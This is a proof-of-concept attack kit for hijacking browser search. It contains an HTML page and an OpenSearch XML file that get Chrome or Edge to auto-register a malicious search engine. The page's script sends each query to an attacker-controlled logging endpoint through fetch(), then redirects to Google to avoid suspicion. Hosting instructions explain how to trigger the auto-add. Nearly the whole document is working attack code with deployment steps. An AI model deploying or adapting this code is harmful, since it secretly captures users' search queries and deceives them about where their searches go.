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POC: Search Engine Hijack via Browser Search Template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Filename: evilSearch.html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Purpose: Add a malicious search engine silently and redirect queries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&lt;title&gt;Totally Normal Search Engine&lt;/title&gt;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&lt;link rel="search" type="application/opensearchdescription+xml" title="EvilSearch" href="/evil-opensearch.xml"&gt;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&lt;script&gt;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// Auto-redirect from homepage to make it seem real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if (window.location.search.includes('q='))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const q = new URLSearchParams(window.location.search).get('q');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// Log to attacker-controlled server (for demo only)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fetch('https://your-logging-endpoint.example.com/log?q=' + encodeURIComponent(q));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// Redirect to Google to not raise suspicion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window.location.href = 'https://www.google.com/search?q=' + encodeURIComponent(q);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&lt;/script&gt;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&lt;h1&gt;Welcome to EvilSearch&lt;/h1&gt;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&lt;form action="" method="GET"&gt;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&lt;input name="q" placeholder="Search here..."&gt;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&lt;button type="submit"&gt;Search&lt;/button&gt;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&lt;/form&gt;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 File: evil-opensearch.xml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 Purpose: Defines the custom search engine template for auto-registration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&lt;OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"&gt;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&lt;ShortName&gt;EvilSearch&lt;/ShortName&gt;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&lt;Description&gt;Hijacked search engine for logging&lt;/Description&gt;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&lt;Url type="text/html" template="https://evilsearch.example.com/?q={searchTerms}"/&gt;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&lt;/OpenSearchDescription&gt;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 Hosting Instructions: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 Serve both files from a public domain (e.g. evilsearch.example.com)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 Visiting the homepage + using the search bar once will auto-add the engine to Chrome/Edge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